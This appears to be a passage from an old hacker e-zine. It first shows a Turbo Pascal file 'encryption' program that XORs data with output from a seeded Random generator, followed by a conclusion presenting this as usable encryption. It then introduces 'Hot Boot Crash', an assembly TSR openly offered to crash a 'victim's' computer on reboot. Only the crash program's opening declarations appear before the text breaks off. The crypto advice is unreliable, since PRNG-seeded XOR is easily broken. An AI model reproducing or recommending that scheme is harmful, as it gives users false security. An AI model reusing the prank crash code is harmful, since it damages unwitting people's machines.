VerifyFile : SearchRec;
InputFile, FileName : string;
begin
{ Verify paramaters }
if ParamCount <> 3 then begin
Writeln ('Invalid number of paramaters');
Halt(1);
end;
{ Verify original file's existance }
FindFirst (Paramstr(1), AnyFile, VerifyFile);
InputFile := paramstr(1);
{ Convert file name to uppercase }
For i := 1 to length(ParamStr(1)) do
FileName := Filename + UpCase(InputFile[i]);
If VerifyFile.Name <> FileName then begin
Writeln ('Input file not found');
Halt(2);
end;
Assign (Input, Paramstr(1)); { Open file for input }
Reset (Input , 1 ) ; { Record size = 1 }
Assign (Output, ParamStr(2)); { Open file for output }
Rewrite (Output, 1 ) ; { Record size = 1 }
Writeln ('Encrypting ', FileSize(Input), ' bytes....');
{ Get information, then encrypt }
{ Seed our generator to give an infininte key }
Val ( Paramstr(3), seed, i);
RandSeed := ( seed );
repeat
BlockRead (Input, Buffer, SizeOf(Buffer), NumRead);
for i :=1 to numread
do begin
Buffer[i] := chr(ord(buffer[i]) XOR Random(256));
end;
BlockWrite ( Output, Buffer, NumRead, NumWritten);
until (numread = 0 ) or (numwritten <> numread);
Close( Input );
Close( Output );
end.
Conclusion
While XOR encryption may have been, in the past, viewed as easily crackable,
with the principle of seeding a key of the length of the original data, you
can incorporate easy encryption into your own software. While it still has
its limitations, in that the random number generator used in one language
will not give you the same set of values in another language, if you did need
to make code that was easily portable to other platforms, you could design
your very own random number generator. This would eliminate any of the above
mentioned limitations.
=============================================================================
Hot Boot Crash by |\|\cFill
|\|\cFill e-mailed this to me, and basically what it does is when the
user (err, victim) Reboots, well their computer will crash.. have fun!
hmm... aparrently South American keyboards beboot on ALT+CTRL+BACKSPACE ...
;
; NAME......: HOTBOOT.ASM
; FUNCTION..: <Hot> Reboot when ALT+CTRL+BACKSPACE
; COMPILER..: Turbo Assembler 2.0 or sup.
; DATE......: 10/12/1996
; AUTHOR....: |\|\cFiLL - TeEnAgErS AsSoCiAtEs
;
; TnG Staff:
; - LuCiFeR
; - SoNiC
; - FlaGG
; - |\|\cFiLL
; - AmAzInG
BEL EQU 7
CR EQU 13
LF EQU 10
LAST_VECT EQU 80h
JMP_FAR EQU 0EAh
SHIFT_STATUS EQU 17h
CRT_ADDR EQU 63h
ALT_CTRL_MASK EQU 0Ch ; MASK FOR ALT+CTRL
BKS_SCAN_CODE EQU 0Eh ; BACKSPACE
CSEG SEGMENT PARA PUBLIC 'CODE'
ASSUME CS:CSEG, DS:CSEG, ES:CSEG, SS:CSEG
ORG 100h
START: JMP MAIN ; EXECUTE THE SOFT
ORG 100h
;*******************************************************************************
; RESIDENT VARIABLES OF SOFT
;*******************************************************************************
VEC_TAB DD LAST_VECT DUP(?) ; PICK UP INT VECTS
BLOCK_ADDR DW ? ; NEXT SEGMENT
BLOCK_SIZE DW ? ; SEGMENT SIZE
OK$ DB BEL, 'TnG Corp: '
DB 'memmory state restored (if possible).